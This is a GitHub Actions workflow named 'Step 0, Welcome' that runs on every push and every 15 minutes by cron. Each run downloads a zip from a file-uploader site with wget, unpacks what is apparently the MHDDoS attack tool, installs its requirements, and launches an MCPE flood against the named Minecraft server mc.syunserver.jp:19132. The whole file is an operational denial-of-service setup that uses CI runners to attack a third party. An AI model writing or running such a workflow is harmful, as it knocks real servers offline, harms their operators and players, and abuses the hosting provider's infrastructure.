name: Step 0, Welcome

on:
  push:
  workflow_dispatch:
  schedule:
    - cron: '0 0 * * *'
    - cron: '15 0 * * *'
    - cron: '30 0 * * *'
    - cron: '45 0 * * *'
    - cron: '0 1 * * *'
    - cron: '15 1 * * *'
    - cron: '30 1 * * *'
    - cron: '45 1 * * *'
    - cron: '0 2 * * *'
    - cron: '15 2 * * *'
    - cron: '30 2 * * *'
    - cron: '45 2 * * *'
    - cron: '0 3 * * *'
    - cron: '15 3 * * *'
    - cron: '30 3 * * *'
    - cron: '45 3 * * *'
    - cron: '0 4 * * *'
    - cron: '15 4 * * *'
    - cron: '30 4 * * *'
    - cron: '45 4 * * *'
    - cron: '0 5 * * *'
    - cron: '15 5 * * *'
    - cron: '30 5 * * *'
    - cron: '45 5 * * *'
    - cron: '0 6 * * *'
    - cron: '15 6 * * *'
    - cron: '30 6 * * *'
    - cron: '45 6 * * *'
    - cron: '0 7 * * *'
    - cron: '15 7 * * *'
    - cron: '30 7 * * *'
    - cron: '45 7 * * *'
    - cron: '0 8 * * *'
    - cron: '15 8 * * *'
    - cron: '30 8 * * *'
    - cron: '45 8 * * *'
    - cron: '0 9 * * *'
    - cron: '15 9 * * *'
    - cron: '30 9 * * *'
    - cron: '45 9 * * *'
    - cron: '0 10 * * *'
    - cron: '15 10 * * *'
    - cron: '30 10 * * *'
    - cron: '45 10 * * *'
    - cron: '0 11 * * *'
    - cron: '15 11 * * *'
    - cron: '30 11 * * *'
    - cron: '45 11 * * *'
    - cron: '0 12 * * *'
    - cron: '15 12 * * *'
    - cron: '30 12 * * *'
    - cron: '45 12 * * *'
    - cron: '0 13 * * *'
    - cron: '15 13 * * *'
    - cron: '30 13 * * *'
    - cron: '45 13 * * *'
    - cron: '0 14 * * *'
    - cron: '15 14 * * *'
    - cron: '30 14 * * *'
    - cron: '45 14 * * *'
    - cron: '0 15 * * *'
    - cron: '15 15 * * *'
    - cron: '30 15 * * *'
    - cron: '45 15 * * *'
    - cron: '0 16 * * *'
    - cron: '15 16 * * *'
    - cron: '30 16 * * *'
    - cron: '45 16 * * *'
    - cron: '0 17 * * *'
    - cron: '15 17 * * *'
    - cron: '30 17 * * *'
    - cron: '45 17 * * *'
    - cron: '0 18 * * *'
    - cron: '15 18 * * *'
    - cron: '30 18 * * *'
    - cron: '45 18 * * *'
    - cron: '0 19 * * *'
    - cron: '15 19 * * *'
    - cron: '30 19 * * *'
    - cron: '45 19 * * *'
    - cron: '0 20 * * *'
    - cron: '15 20 * * *'
    - cron: '30 20 * * *'
    - cron: '45 20 * * *'
    - cron: '0 21 * * *'
    - cron: '15 21 * * *'
    - cron: '30 21 * * *'
    - cron: '45 21 * * *'
    - cron: '0 22 * * *'
    - cron: '15 22 * * *'
    - cron: '30 22 * * *'
    - cron: '45 22 * * *'
    - cron: '0 23 * * *'
    - cron: '15 23 * * *'
    - cron: '30 23 * * *'
    - cron: '45 23 * * *'


jobs:

  build:


    runs-on: ubuntu-latest


    steps:

    - name: ダウンロード

      run: wget http://nkgpgc.sx3.jp/uploader51/upl/JWIjLWByC8ZFQ_xUr12r/00012.zip

    - name: 展開

      run: unzip 00012.zip -d ./

    - name: コピー

      run: cp -R ./MHDDoS-2.4.2/* ./

    - name: インストール

      run: pip3 install -r requirements.txt

    - name: 実行

      run: python3 start.py MCPE mc.syunserver.jp:19132 2000 1000
